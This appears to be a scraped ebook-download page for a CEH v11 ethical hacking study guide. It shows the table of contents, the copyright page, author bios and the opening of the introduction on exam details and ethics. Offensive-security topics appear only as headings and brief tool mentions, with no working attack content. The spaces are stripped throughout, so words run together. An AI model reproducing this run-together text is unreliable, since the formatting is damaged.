CEH v11 Certified Ethical Hacker Study Guide [1&nbsp - EBIN ...

Research, identification, and selection of targets. Pairing remote access malware with exploit into a deliverable payload (e.g., Adobe PDF and Microsoft Office ... Home CEHv11CertifiedEthicalHackerStudyGuide[1 ed.] 1119800285,9781119800286 CEHv11CertifiedEthicalHackerStudyGuide[1 ed.] 1119800285,9781119800286 Asprotectinginformation continuestobe agrowingconcernfortoday’sbusinesses,certificationsinITsecurityhaveb 2,392 354 28MB English Pages704 [701] Year2021 ReportDMCA/Copyright DOWNLOADPDFFILE Tableofcontents:CoverTitlePageCopyrightPageAboutthe AuthorContentsataGlanceContentsIntroductionWhatIsaCEH?TheSubjectMatterAboutthe ExamWhoIsEligibleExamCostAboutEC-CouncilUsingThisBookObjectiveMapLet’sGetStarted!AssessmentTestAnswersto AssessmentTestAssessmentTestAnswerstoAssessmentTestChapter1EthicalHackingOverviewof EthicsOverviewof EthicalHackingMethodologiesCyberKillChainAttackLifecycleMethodologyof EthicalHackingReconnaissanceand FootprintingScanningand EnumerationGainingAccessMaintainingAccessCoveringTracksSummaryChapter2NetworkingFoundationsCommunicationsModelsOpenSystemsInterconnectionTCP/IPArchitectureTopologiesBusNetworkStarNetworkRingNetworkMeshNetworkHybridPhysicalNetworkingAddressingSwitchingIPHeadersAddressingSubnetsTCPUDPInternetControlMessageProtocolNetworkArchitecturesNetworkTypesIsolationRemoteAccessCloudComputingStorageas aServiceInfrastructureas aServicePlatformas aServiceSoftwareas aServiceInternetof ThingsSummaryReviewQuestionsChapter3SecurityFoundationsTheTriadConfidentialityIntegrityAvailabilityParkerianHexadRiskPolicies,Standards,and ProceduresSecurityPoliciesSecurityStandardsProceduresGuidelinesOrganizingYourProtectionsSecurityTechnologyFirewallsIntrusionDetectionSystemsIntrusionPreventionSystemsEndpointDetectionand ResponseSecurityInformationand EventManagementBeingPreparedDefensein DepthDefensein BreadthDefensibleNetworkArchitectureLoggingAuditingSummaryReviewQuestionsChapter4Footprintingand ReconnaissanceOpenSourceIntelligenceCompaniesPeopleSocialNetworkingDomainNameSystemNameLookupsZoneTransfersPassiveDNSPassiveReconnaissanceWebsiteIntelligenceTechnologyIntelligenceGoogleHackingInternetofThings(IoT)SummaryReviewQuestionsChapter5ScanningNetworksPingSweepsUsingfpingUsingMegaPingPortScanningNmapmasscanMegaPingMetasploitVulnerabilityScanningOpenVASNessusLookingfor Vulnerabilitieswith MetasploitPacketCraftingand ManipulationhpingpackETHfragrouteEvasionTechniquesProtectingand DetectingSummaryReviewQuestionsChapter6EnumerationServiceEnumerationRemoteProcedureCallsSunRPCRemoteMethodInvocationServerMessageBlockBuilt-inUtilitiesnmapScriptsNetBIOSEnumeratorMetasploitOtherUtilitiesSimpleNetworkManagementProtocolSimpleMailTransferProtocolWeb-BasedEnumerationSummaryReviewQuestionsChapter7SystemHackingSearchingfor ExploitsSystemCompromiseMetasploitModulesExploit-DBGatheringPasswordsPasswordCrackingJohnthe RipperRainbowTablesKerberoastingClient-SideVulnerabilitiesLivingOffthe LandFuzzingPostExploitationEvasionPrivilegeEscalationPivotingPersistenceCoveringTracksSummaryReviewQuestionsChapter8MalwareMalwareTypesVirusWormTrojanBotnetRansomwareDropperMalwareAnalysisStaticAnalysisDynamicAnalysisCreatingMalwareWritingYourOwnUsingMetasploitObfuscatingMalwareInfrastructureAntivirusSolutionsPersistenceSummaryReviewQuestionsChapter9SniffingPacketCapturetcpdumptsharkWiresharkBerkeleyPacketFilterPortMirroring/SpanningPacketAnalysisSpoofingAttacksARPSpoofingDNSSpoofingsslstripSpoofingDetectionSummaryReviewQuestionsChapter10SocialEngineeringSocialEngineeringPretextingSocialEngineeringVectorsPhysicalSocialEngineeringBadgeAccessManTrapsBiometricsPhoneCallsBaitingPhishingAttacksWebsiteAttacksCloningRogueAttacksWirelessSocialEngineeringAutomatingSocialEngineeringSummaryReviewQuestionsChapter11WirelessSecurityWi-FiWi-FiNetworkTypesWi-FiAuthenticationWi-FiEncryptionBringYourOwnDeviceWi-FiAttacksBluetoothScanningBluejackingBluesnarfingBluebuggingMobileDevicesMobileDeviceAttacksSummaryReviewQuestionsChapter12Attackand DefenseWebApplicationAttacksXMLExternalEntityProcessingCross-SiteScriptingSQLInjectionCommandInjectionFileTraversalWebApplicationProtectionsDenial-of-ServiceAttacksBandwidthAttacksSlowAttacksLegacyApplicationExploitationBufferOverflowHeapSprayingApplicationProtectionsand EvasionsLateralMovementDefensein Depth/Defensein BreadthDefensibleNetworkArchitectureSummaryReviewQuestionsChapter13CryptographyBasicEncryptionSubstitutionCiphersDiffie-HellmanSymmetricKeyCryptographyDataEncryptionStandardAdvancedEncryptionStandardAsymmetricKeyCryptographyHybridCryptosystemNonrepudiationEllipticCurveCryptographyCertificateAuthoritiesand Key ManagementCertificateAuthorityTrustedThirdPartySelf-SignedCertificatesCryptographicHashingPGPandS/MIMEDiskand FileEncryptionSummaryReviewQuestionsChapter14SecurityArchitectureand DesignDataClassificationSecurityModelsStateMachineBibaBell-LaPadulaClark-WilsonIntegrityModelApplicationArchitecturen-tierApplicationDesignService-OrientedArchitectureCloud-BasedApplicationsDatabaseConsiderationsSecurityArchitectureSummaryReviewQuestionsChapter15CloudComputingand theInternetof ThingsCloudComputingOverviewCloudServicesSharedResponsibilityModelPublicvs.PrivateCloudCloudArchitecturesand DeploymentResponsiveDesignCloud-NativeDesignDeploymentDealingwithRESTCommonCloudThreatsAccessManagementDataBreachWebApplicationCompromiseCredentialCompromiseInsiderThreatInternetof ThingsOperationalTechnologySummaryReviewQuestionsAppendixAnswerstoReviewQuestionsChapter 2:NetworkingFoundationsChapter 3:SecurityFoundationsChapter 4:Footprintingand ReconnaissanceChapter 5:ScanningNetworksChapter 6:EnumerationChapter 7:SystemHackingChapter 8:MalwareChapter 9:SniffingChapter 10:SocialEngineeringChapter 11:WirelessSecurityChapter 12:Attackand DefenseChapter 13:CryptographyChapter 14:SecurityArchitectureand DesignChapter 15:CloudComputingand theInternetof ThingsIndexComprehensiveOnlineLearningEnvironmentRegisterandAccesstheOnlineTestBankEULA RecommendPapers CEHv11CertifiedEthicalHackerStudyGuide[1 ed.] 9781119800286,9781119800293,9781119800309,1119800285 Asprotectinginformationcontinuestobeagrowingconcernfortoday’sbusinesses,certificationsinITsecurityhaveb 834 101 28MB Readmore CEHCertifiedEthicalHackerStudyGuide 9780470525203,0470525207 PrepareforthenewversionofCEHcertificationwiththisadvancedguideOnceyoulearnthethoughtprocessesofunethi 355 30 7MB Readmore CEH:OfficialCertifiedEthicalHackerReviewGuide 0782144373,9780782144376 TheCertifiedEthicalHackerexamisquicklybecomingoneofthemostpopularsecuritycertificationsofferedtoday.Can 334 39 2MB Readmore CEHv11:CertifiedEthicalHackerVersion11PracticeTests[2 ed.] 1119824516,9781119824510 MasterCEHv11andidentifyyourweakspots CEH:CertifiedEthicalHackerVersion11PracticeTestsaretheidealprep 1,120 200 9MB Readmore CEHOfficialCertifiedEthicalHackerReviewGuideExam312-50 978-0-7821-4437-6 277 73 2MB Readmore CEHOfficialCertifiedEthicalHackerReviewGuideExam312-50 978-0-7821-4437-6 295 90 2MB Readmore CEH:OfficialCertifiedEthicalHackerReviewGuide:Exam312-50 0782144373,9780782144376 Thisbookisadecentoverview.Itisnotthebookyouwoulduseasyourprimarytoolforgettingreadyforthecertific 296 37 1MB Readmore CehCertifiedEthicalHackerAll-In-OneExamGuide[Fourthedition] 9781260454567,1260454568,9781260454550,126045455X Publisher'sNote:ProductspurchasedfromThirdPartysellersarenotguaranteedbythepublisherforquality,auth 470 21 19MB Readmore CEHCertifiedEthicalHackerPracticeExams,FourthEdition[4 ed.] 1260455084,9781260455083 Publisher'sNote:ProductspurchasedfromThirdPartysellersarenotguaranteedbythepublisherforquality,auth 287 121 6MB Readmore CEHCertifiedEthicalHackerAll-in-OneExamGuide,FourthEdition,4thEdition[4 ed.] 9781260454567,1260454568 AcomprehensiveguidetotheCEHexamCEHCertifiedEthicalHackerAll-in-OneExamGuideofferscompletecoverageoftheC 245 53 11MB Readmore Author/Uploaded RicMessier 1 1 0 Likethispaperanddownload?YoucanpublishyourownPDFfileonlineforfreeinafewminutes! SignUp Fileloadingpleasewait... Citationpreview CEH™v11CertifiedEthicalHackerStudyGuideCEH™v11CertifiedEthicalHackerStudyGuideRicMessier,CEH,GSEC,CISSPCopyright©2021byJohnWiley&Sons,Inc.Allrightsreserved.PublishedbyJohnWiley&Sons,Inc.,Hoboken,NewJersey.PublishedsimultaneouslyinCanada.ISBN:978-­1-­119-­80028-­6ISBN:978-­1-­119-­80029-­3(ebk)ISBN:978-­1-­119-­80030-­9(ebk)Nopartofthispublicationmaybereproduced,storedinaretrievalsystem,ortransmittedinanyformorbyanymeans,electronic,mechanical,photocopying,recording,scanning,orotherwise,exceptaspermittedunderSection 107or108ofthe1976UnitedStatesCopyrightAct,withouteitherthepriorwrittenpermissionofthePublisher,orauthorizationthroughpaymentoftheappropriateper-­copyfeetotheCopyrightClearanceCenter,Inc.,222RosewoodDrive,Danvers,MA01923,(978)750-­8400,fax(978)750-­4470,oronthewebatwww.copyright.com.RequeststothePublisherforpermissionshouldbeaddressedtothePermissionsDepartment,JohnWiley&Sons,Inc.,111RiverStreet,Hoboken,NJ07030,(201)748-­6011,fax(201)748-­6008,oronlineathttp://www.wiley.com/go/permission.LimitofLiability/DisclaimerofWarranty:Whilethepublisherandauthorhaveusedtheirbesteffortsinpreparingthisbook,theymakenorepresentationsorwarrantieswithrespecttotheaccuracyorcompletenessofthecontentsofthisbookandspecificallydisclaimanyimpliedwarrantiesofmerchantabilityorfitnessforaparticularpurpose.Nowarrantymaybecreatedorextendedbysalesrepresentativesorwrittensalesmaterials.Theadviceandstrategiescontainedhereinmaynotbesuitableforyoursituation.Youshouldconsultwithaprofessionalwhereappropriate.Neitherthepublishernorauthorshallbeliableforanylossofprofitoranyothercommercialdamages,includingbutnotlimitedtospecial,incidental,consequential,orotherdamages.Forgeneralinformationonourotherproductsandservicesorfortechnicalsupport,pleasecontactourCustomerCareDepartmentwithintheUnitedStatesat(800)762-­2974,outsidetheUnitedStatesat(317)572-­3993orfax(317)572-­4002.Wileyalsopublishesitsbooksinavarietyofelectronicformats.Somecontentthatappearsinprintmaynotbeavailableinelectronicformats.FormoreinformationaboutWileyproducts,visitourwebsiteatwww.wiley.com.LibraryofCongressControlNumber:2021939941TRADEMARKS:WILEYandtheWileylogoaretrademarksorregisteredtrademarksofJohnWiley&Sons,Inc.and/oritsaffiliates,intheUnitedStatesandothercountries,andmaynotbeusedwithoutwrittenpermission.CEHisatrademarkofEC-­Council.Allothertrademarksarethepropertyoftheirrespectiveowners.JohnWiley&Sons,Inc.isnotassociatedwithanyproductorvendormentionedinthisbook.Coverimage:©GettyImagesInc./JeremyWoodhouseCoverdesign:WileyForRobin,theinspirationallightinmylife.Aboutthe AuthorRicMessier,GCIH,CCSP,GSEC,CEH,CISSP,MS,hasentirelytoomanylettersafterhisname,asthoughhespendstimegatheringupstraysthatfollowhimhomeattheendoftheday.HisinterestininformationsecuritybeganinhighschoolbutwascementedwhenhewasafreshmanattheUniversityofMaine,Orono,whenhetookadvantageofavulnerabilityinajailedenvironmenttobreakoutofthejailandgainelevatedprivilegesonanIBMmainframeintheearly1980s.HisfirstexperiencewithUnixwasinthemid-­1980sandwithLinuxinthemid-­1990s.Ricisanauthor,trainer,educator,andsecurityprofessionalwithmultipledecadesofexperience.HeiscurrentlyaPrincipalConsultantwithFireEyeMandiantandoccasionallyteachescoursesatHarvardUniversity.Aboutthe TechnicalEditorErinO'BrieniscurrentlyasecurityconsultantatMandiant,whereshefocusesonincidentresponseandthreatintelligence.Shehasover7yearsofexperienceintheinformationtechnologyindustry,withspecialtiesinvulnerabilitymanagement,securityengineering,anddatalossprevention.ContentsataGlanceIntroductionxixAssessmentTestxxviChapter1EthicalHacking1Chapter2NetworkingFoundations15Chapter3SecurityFoundations57Chapter4Footprintingand Reconnaissance97Chapter5ScanningNetworks155Chapter6Enumeration221SystemHacking263Chapter8Malware319Chapter9Sniffing367Chapter7Chapter10SocialEngineering407Chapter11WirelessSecurity439Chapter12Attackand Defense479Chapter13Cryptography515Chapter14SecurityArchitectureand Design547Chapter15CloudComputingand theInternetof Things573AppendixAnswers to Review Questions617Index649ContentsIntroductionxixAssessmentTestChapter1xxviEthicalHacking1Overviewof Ethics2Overviewof EthicalHacking5Methodologies6CyberKillChain6AttackLifecycle8Methodologyof EthicalHacking10Reconnaissanceand Footprinting10Scanningand Enumeration11GainingAccess11MaintainingAccess12CoveringTracks12Summary13Chapter2NetworkingFoundations15CommunicationsModels17OpenSystemsInterconnection18TCP/IPArchitecture21Topologies22BusNetwork22StarNetwork23RingNetwork24MeshNetwork25Hybrid26PhysicalNetworking27Addressing27Switching28IP29Headers29Addressing31Subnets33TCP34UDP38InternetControlMessageProtocol39xii ContentsNetworkArchitectures40NetworkTypes40Isolation41RemoteAccess43CloudComputing44Storageas aService45Infrastructureas aService46Platformas aService48Softwareas aService49Internetof Things51Summary52ReviewQuestions54Chapter3SecurityFoundations57TheTriad59Confidentiality59Integrity61Availability62ParkerianHexad63Risk64Policies,Standards,and Procedures66SecurityPolicies66SecurityStandards67Procedures68Guidelines68OrganizingYourProtections69SecurityTechnology72Firewalls72IntrusionDetectionSystems77IntrusionPreventionSystems80EndpointDetectionand Response81SecurityInformationand EventManagement83BeingPrepared84Defensein Depth84Defensein Breadth86DefensibleNetworkArchitecture87Logging88Auditing90Summary92ReviewQuestions93Contents Chapter4Footprintingand Reconnaissancexiii97OpenSourceIntelligence99Companies99People108SocialNetworking111DomainNameSystem124NameLookups125ZoneTransfers130PassiveDNS133PassiveReconnaissance136WebsiteIntelligence139TechnologyIntelligence144GoogleHacking144InternetofThings(IoT)146Summary148ReviewQuestions150Chapter5ScanningNetworks155PingSweeps157Usingfping157UsingMegaPing159PortScanning161Nmap162masscan176MegaPing178Metasploit180VulnerabilityScanning183OpenVAS184Nessus196Lookingfor Vulnerabilitieswith Metasploit202PacketCraftingand Manipulation203hping204packETH207fragroute209EvasionTechniques211Protectingand Detecting214Summary215ReviewQuestions217Chapter6Enumeration221ServiceEnumeration223RemoteProcedureCalls226SunRPC226RemoteMethodInvocation228xiv ContentsServerMessageBlock232Built-­inUtilities233nmapScripts237NetBIOSEnumerator239Metasploit240OtherUtilities242SimpleNetworkManagementProtocol245SimpleMailTransferProtocol247Web-­BasedEnumeration250Summary257ReviewQuestions259Chapter7SystemHacking263Searchingfor Exploits265SystemCompromise269MetasploitModules270Exploit-­DB274GatheringPasswords276PasswordCracking279Johnthe Ripper280RainbowTables282Kerberoasting284Client-­SideVulnerabilities289LivingOffthe Land291Fuzzing292PostExploitation295Evasion295PrivilegeEscalation296Pivoting301Persistence304CoveringTracks307Summary313ReviewQuestions315Chapter8Malware319MalwareTypes321Virus321Worm323Trojan324Botnet324Ransomware326Dropper328Contents xvMalwareAnalysis328StaticAnalysis329DynamicAnalysis340CreatingMalware349WritingYourOwn350UsingMetasploit353Obfuscating356MalwareInfrastructure357AntivirusSolutions359Persistence360Summary361ReviewQuestions363Chapter9Sniffing367PacketCapture368tcpdump369tshark376Wireshark378BerkeleyPacketFilter382PortMirroring/Spanning384PacketAnalysis385SpoofingAttacks390ARPSpoofing390DNSSpoofing394sslstrip397SpoofingDetection398Summary399ReviewQuestions402Chapter10SocialEngineering407SocialEngineering408Pretexting410SocialEngineeringVectors412PhysicalSocialEngineering413BadgeAccess413ManTraps415Biometrics416PhoneCalls417Baiting418PhishingAttacks418WebsiteAttacks422Cloning423RogueAttacks426xvi ContentsWirelessSocialEngineering427AutomatingSocialEngineering430Summary433ReviewQuestions435Chapter11WirelessSecurity439Wi-­Fi440Wi-­FiNetworkTypes442Wi-­FiAuthentication445Wi-­FiEncryption446BringYourOwnDevice450Wi-­FiAttacks451Bluetooth462Scanning463Bluejacking465Bluesnarfing466Bluebugging466MobileDevices466MobileDeviceAttacks467Summary472ReviewQuestions474Chapter12Attackand Defense479WebApplicationAttacks480XMLExternalEntityProcessing482Cross-­SiteScripting483SQLInjection485CommandInjection487FileTraversal489WebApplicationProtections490Denial-­of-­ServiceAttacks492BandwidthAttacks492SlowAttacks495Legacy497ApplicationExploitation497BufferOverflow498HeapSpraying500ApplicationProtectionsand Evasions501LateralMovement502Defensein Depth/Defensein Breadth504DefensibleNetworkArchitecture506Summary508ReviewQuestions510Contents Chapter13Cryptographyxvii515BasicEncryption517SubstitutionCiphers517Diffie-­Hellman520SymmetricKeyCryptography521DataEncryptionStandard522AdvancedEncryptionStandard523AsymmetricKeyCryptography524HybridCryptosystem525Nonrepudiation525EllipticCurveCryptography526CertificateAuthoritiesand Key Management528CertificateAuthority528TrustedThirdParty531Self-­SignedCertificates532CryptographicHashing534PGPandS/MIME536Diskand FileEncryption538Summary541ReviewQuestions543Chapter14SecurityArchitectureand Design547DataClassification548SecurityModels550StateMachine550Biba551Bell-­LaPadula552Clark-­WilsonIntegrityModel552ApplicationArchitecture553n-­tierApplicationDesign554Service-­OrientedArchitecture557Cloud-­BasedApplications559DatabaseConsiderations561SecurityArchitecture563Summary567ReviewQuestions569Chapter15CloudComputingand theInternetof ThingsCloudComputingOverviewCloudServicesSharedResponsibilityModelPublicvs.PrivateCloud573574578583585xviii ContentsCloudArchitecturesand Deployment586ResponsiveDesign588Cloud-­NativeDesign589Deployment590DealingwithREST593CommonCloudThreats598AccessManagement598DataBreach600WebApplicationCompromise600CredentialCompromise602InsiderThreat604Internetof Things604OperationalTechnology610Summary612ReviewQuestions614AppendixAnswers to Review QuestionsChapter 2:NetworkingFoundationsChapter 3:SecurityFoundationsChapter 4:Footprintingand ReconnaissanceChapter 5:ScanningNetworksChapter 6:EnumerationChapter 7:SystemHackingChapter 8:MalwareChapter 9:SniffingChapter 10:SocialEngineeringChapter 11:WirelessSecurityChapter 12:Attackand DefenseChapter 13:CryptographyChapter 14:SecurityArchitectureand DesignChapter 15:CloudComputingand theInternetof Things617618619622624627629632635636638641643645646Index649IntroductionYou’rethinkingaboutbecomingaCertifiedEthicalHacker(CEH).Nomatterwhatvariationofsecuritytestingyouareperforming—­ethicalhacking,penetrationtesting,redteaming,orapplicationassessment—­theskillsandknowledgenecessarytoachievethiscertificationareindemand.Eventheideaofsecuritytestingandethicalhackingisevolvingasbusinessesandorganizationsbegintohaveabetterunderstandingoftheadversariestheyarefacing.It’snolongertheso-­calledscriptkiddiesthatbusinessesfelttheywerefendingoffforsolong.Today’sadversaryisorganized,well-­funded,anddetermined.Thismeanstestingrequiresdifferenttactics.Dependingonwhoyouarelisteningto,80–90percentofattackstodayusesocialengineering.Theoldtechniqueoflookingfortechnicalvulnerabilitiesinnetworkservicesissimplynothowattackersaregettingintonetworks.Networksthatarefocusedonapplyingadefense-­in-­depthapproach,hardeningtheoutside,mayendupbeingsusceptibletoattacksfromtheinside,whichiswhathappenswhendesktopsystemsarecompromised.Theskillsneededtoidentifyvulnerabilitiesandrecommendremediationsareevolving,alongwiththetacticsandtechniquesusedbyattackers.ThisbookiswrittentohelpyouunderstandthebreadthofcontentyouwillneedtoknowtoobtaintheCEHcertification.Youwillfindalotofconceptstoprovideyouafoundationthatcanbeappliedtotheskillsrequiredforthecertification.Whileyoucanreadthisbookcovertocover,forasubstantialchunkofthesubjectsgettinghands-­onexperienceisessential.Theconceptsareoftendemonstratedthroughtheuseoftools.Followingalongwiththesedemonstrationsandusingthetoolsyourselfwillhelp youunderstandthetoolsandhowtousethem.Manyofthedemonstrationsaredonein KaliLinux,thoughmanyofthetoolshaveWindowsanalogsifyouaremorecomfortablethere.Wecan’tgetthroughthiswithouttalkingaboutethics,thoughyouwillfinditmentionedinseveralplacesthroughoutthebook.Thisisserious,andnotonlybecauseit’sahugepartofthebasisforthecertification.It’salsoessentialforprotectingyourselfandthepeopleyouareworkingfor.Theshortversionisdonotdoanythingthatwouldcausedamagetosystemsoryouremployer.Thereismuchmoretoitthanthat,whichyou’llreadmoreaboutinChapter 1asastartingpoint.It’snecessarytostartwrappingyourheadaroundtheethicsinvolvedinthisexamandprofession.Youwillhavetosignanagreementaspartofachievingyourcertification.Attheendofeachchapter,youwillfindasetofquestions.Thiswillhelpyoutodemonstratetoyourselfthatyouunderstandthecontent.Mostofthequestionsaremultiplechoice,whichisthequestionformatusedfortheCEHexam.Thesequestions,alongwiththehands­onexperienceyoutakeadvantageof,willbegoodpreparationfortakingtheexam.WhatIsaCEH?TheCertifiedEthicalHackerexamistovalidatethatthoseholdingthecertificationunderstandthebroadrangeofsubjectmatterthatisrequiredforsomeonetobeaneffectiveethicalhacker.Therealityisthatmostdays,ifyouarepayingattentiontothenews,youxx Introductionwillseeanewsstoryaboutacompanythathasbeencompromisedandhaddatastolen,agovernmentthathasbeenattacked,orevenenormousdenial-­of-­serviceattacks,makingitdifficultforuserstogainaccesstobusinessresources.TheCEHisacertificationthatrecognizestheimportanceofidentifyingsecurityissuestogetthemremediated.Thisisonewaycompaniescanprotectthemselvesagainstattacks—­bygettingtherebeforetheattackersdo.Itrequiressomeonewhoknowshowtofollowtechniquesthatattackerswouldnormallyuse.Justrunningscansusingautomatedtoolsisinsufficientbecauseasgoodassecurityscannersmaybe,theywillidentifyfalsepositives—­caseswherethescannerindicatesanissuethatisn’treallyanissue.Additionally,theywillmissalotofvulnerabilities—­falsenegatives—­foravarietyofreasons,includingthefactthatthevulnerabilityorattackmaynotbeknown.Becausecompaniesneedtounderstandwheretheyarevulnerabletoattack,theyneedpeoplewhoareabletoidentifythosevulnerabilities,whichcanbeverycomplex.Scannersareagoodstart,butbeingabletofindholesincomplexnetworkscantakethecreativeintelligencethathumansoffer.Thisiswhyweneedethicalhackers.Thesearepeoplewhocantakeextensiveknowledgeofabroadrangeoftechnicalsubjectsanduseittoidentifyvulnerabilitiesthatcanbeexploited.Theimportantpartofthattwo-­wordphrase,bytheway,is“ethical.”Companieshaveprotectionsinplacebecausetheyhaveresourcestheydon’twantstolenordamaged.Whentheybringinsomeonewhoislookingforvulnerabilitiestoexploit,theyneedtobecertainthatnothingwillbestolenordamaged.Theyalsoneedtobecertainthatanythingthatmaybeseenorreviewedisn’tsharedwithanyoneelse.Thisisespeciallytruewhenitcomestoanyvulnerabilitiesthathavebeenidentified.TheCEHexam,then,hasadualpurpose.Itnotonlytestsdeeplytechnicalknowledgebutalsobindsanyonewhoisacertificationholdertoacodeofconduct.Notonlywillyoubeexpectedtoknowthecontentandexpectationsofthatcodeofconduct,youwillbeexpectedtolivebythatcode.WhencompanieshireorcontracttopeoplewhohavetheirCEHcertification,theycanbeassuredtheyhavebroughtonsomeonewithdiscretionwhocankeeptheirsecretsandprovidethemwithprofessionalserviceinordertohelpimprovetheirsecuritypostureandkeeptheirimportantresourcesprotected.TheSubjectMatterIfyouweretotaketheCEHv11training,youwouldhavetogothroughthefollowingmodules:■■IntroductiontoEthicalHacking■■FootprintingandReconnaissance■■ScanningNetworks■■Enumeration■■VulnerabilityAnalysis■■SystemHackingIntroduction ■■MalwareThreats■■Sniffing■■SocialEngineering■■DenialofService■■SessionHijacking■■EvadingIDSs,Firewalls,andHoneypots■■HackingWebServers■■HackingWebApplications■■SQLInjection■■HackingWirelessNetworks■■HackingMobilePlatforms■■IoTHacking■■CloudComputing■■CryptographyxxiAsyoucansee,therangeofsubjectsisbroad.Beyondknowingtheconceptsassociatedwiththesetopics,youwillbeexpectedtoknowaboutvarioustoolsthatmaybeusedtoperformtheactionsassociatedwiththeconceptsyouarelearning.Youwillneedtoknowtoolslikenmapforportscanning,forexample.Youmayneedtoknowproxy-­basedwebapplicationattacktools.Forwirelessnetworkattacks,youmayneedtoknowabouttheaircrack-­ngsuiteoftools.Foreverymodulelisted,therearepotentiallydozensoftoolsthatmaybeused.ThesubjectmatteroftheCEHexamisverytechnical.Thisisnotafieldinwhichyoucangetbywiththeoreticalknowledge.YouwillneedtohavehadexperiencewiththemethodsandtoolsthatarecoveredwithinthesubjectmatterfortheCEHexam.Whatyoumayalsohavenoticedhereisthatthemodulesallfallwithinthedifferentstagesmentionedearlier.Whileyoumaynotnecessarilybeaskedforaspecificmethodology,youwillfindthatthecontentsoftheexamdogenerallyfollowthemethodologythattheEC-­Councilbelievestobeastandardapproach.Aboutthe ExamTheCEHexamhasmuchthesameparametersasotherprofessionalcertificationexams.Youwilltakeacomputerized,proctoredexam.Youwillhave4hourstocomplete125questions.Thatmeansyouwillhave,onaverage,roughly2 minutesperquestion.The questionsareallmultiplechoice.TheexamcanbetakenthroughtheECCExamCenterorataPearsonVUEcenter.FordetailsaboutVUE,pleasevisithttps://www.vue.com/eccouncil.Shouldyouwanttotakeyourcertificationevenfurther,youcouldgoaftertheCEHPracticalexam.Forthisexamyoumustperformanactualpenetrationtestandwriteareportattheendofit.Thisdemonstratesthatinadditiontoknowingthebodyofmaterialcoveredxxii Introductionbytheexam,youcanputthatknowledgetouseinapracticalway.Youwillbeexpectedtoknowhowtocompromisesystemsandidentifyvulnerabilities.Topasstheexam,youwillhavetocorrectlyansweracertainnumberofquestions,thoughtheactualnumberwillvary.Thepassinggradevariesdependingonthedifficultyofthequestionsasked.Theharderthequestionsthatareaskedoutofthecompletepoolofquestions,thefewerquestionsyouneedtogetrighttopasstheexam.Ifyougeteasierquestions,youwillneedtogetmoreofthequestionsrighttopass.Therearesomesourcesofinformationthatwilltellyouthatyouneedtoget70percentofthequestionsright,andthatmaybeokayforgeneralguidanceandpreparationasaroughlow-­endmarker.However,keepinmindthatwhenyousitdowntotaketheactualtestatthetestingcenter,thepassinggradewillvary.Thescoreyouwillneedtoachievewillrangefrom60to85percent.Thegoodnewsisthatyouwillknowwhetheryoupassedbeforeyouleavethetestingcenter.Youwillgetyourscorewhenyoufinishtheexam,andyouwillalsogetapieceofpaperindicatingthedetailsofyourgrade.Youwillgetfeedbackassociatedwiththedifferentscoringareasandhowyouperformedineachofthem.WhoIsEligibleNoteveryoneiseligibletositfortheCEHexam.Beforeyougotoofardowntheroad,youshouldcheckyourqualifications.Justasastartingpoint,youhavetobeatleast18yearsofage.Theothereligibilitystandardsareasfollows:■■■■■■Anyonewhohasversions1–7oftheCEHcertification.TheCEHcertificationisANSIcertifiednow,butearlyversionsoftheexamwereavailablebeforethecertification.AnyonewhowantstotaketheANSI-­accreditedcertificationwhohastheearlyversionoftheCEHcertificationcantaketheexam.Minimumoftwoyearsofrelatedworkexperience.Anyonewhohastheexperiencewillhavetopayanonrefundableapplicationfeeof$100.HavetakenanEC-­Counciltraining.Ifyoumeetthesequalificationstandards,youcanapplyforthecertification,alongwithpayingthefeeifitisapplicabletoyou(ifyoutakeoneoftheEC-­Counciltrainings,thefeeisincluded).Theapplicationwillbevalidforthreemonths.ExamCostTotakethecertificationexam,youneedtopayforaPearsonVUEexamvoucher.Thecostofthisis$1,199.YoucouldalsoobtainanEC-­Councilvoucherfor$950,butthatrequiresthatyouhavetakenEC-­CounciltrainingandcanprovideaCertificateofAttendance.EC-Councilmaychangetheireligibility,pricing,orexampoliciesfromtimetotime.WehighlyencourageyoutocheckforupdatedpoliciesattheEC-Councilwebsite(https://cert.eccouncil.org/certified-ethical-hacker.html)whenyoubeginstudyingforthisbookandagainwhenyouregisterforthisexam.Introduction xxiiiAboutEC-­CouncilTheInternationalCouncilofElectronicCommerceConsultantsismorecommonlyknownastheEC-­Council.ItwascreatedaftertheairplaneattacksthathappenedagainsttheUnitedStatesonSeptember11,2001.Thefounder,JayBavisi,wonderedwhatwouldhappeniftheperpetratorsoftheattackdecidedtomovefromthekineticworldtothedigitalworld.Evenbeyondthatparticularsetofattackers,theInternethasbecomeahosttoalargenumberofpeoplewhoareinterestedincausingdamageorstealinginformation.TheeconomicsoftheInternet,meaningthelowcostofentryintothebusiness,encouragecriminalstouseitasameansofstealinginformation,ransomingdata,orothermaliciousacts.TheEC-­Councilisconsideredtobeoneofthelargestcertifyingbodiesintheworld.Itoperatesin145countriesandhascertifiedmorethan200,000people.InadditiontotheCEH,theEC-­CounciladministersanumberofotherIT-­relatedcertifications:■■CertifiedNetworkDefender(CND)■■CertifiedEthicalHacker(CEH)■■CertifiedEthicalHackerPractical■■EC-­CouncilCertifiedSecurityAnalyst(ECSA)■■EC-­CouncilCertifiedSecurityAnalystPractical■■LicensedPenetrationTester(LPT)■■ComputerHackingForensicInvestigator(CHFI)■■CertifiedChiefInformationSecurityOfficer(CCISO)OneadvantagetoholdingacertificationfromtheEC-­CouncilisthattheorganizationhasbeenaccreditedbytheAmericanNationalStandardsInstitute(ANSI).Additionally,andperhapsmoreimportantlyforpotentialcertificationholders,thecertificationsfromEC-­CouncilarerecognizedworldwideandhavebeenendorsedbygovernmentalagenciesliketheNationalSecurityAgency(NSA).TheDepartmentofDefenseDirective8570 includestheCEHcertification.ThisisimportantbecausehavingtheCEHcertificationmeansthatyoucouldbequicklyqualifiedforanumberofpositionswiththeUnitedStatesgovernment.TheCEHcertificationprovidesabar.Thismeansthereisasetofknownstandards.Toobtainthecertification,youwillneedtohavemetatleasttheminimalstandard.Thesestandardscanbereliedonconsistently.ThisiswhysomeonewiththeCEHcertificationcanbetrusted.Theyhavedemonstratedthattheyhavemetknownandacceptedstandardsofbothknowledgeandprofessionalconduct.UsingThisBookThisbookisstructuredinawaythatfoundationalmaterialisupfront.Withthisapproach,youcanmakeyourwayinanorderlyfashionthroughthebook,onechapteratatime.Technicalbookscanbedryanddifficulttogetthroughsometimes,butit’salwaysmygoaltotrytomakethemeasytoreadandIhopeentertainingalongtheway.Ifyoualreadyhavealotofexperience,youdon’tneedtotakethedirectroutefrombeginningtoend.Youcanxxiv 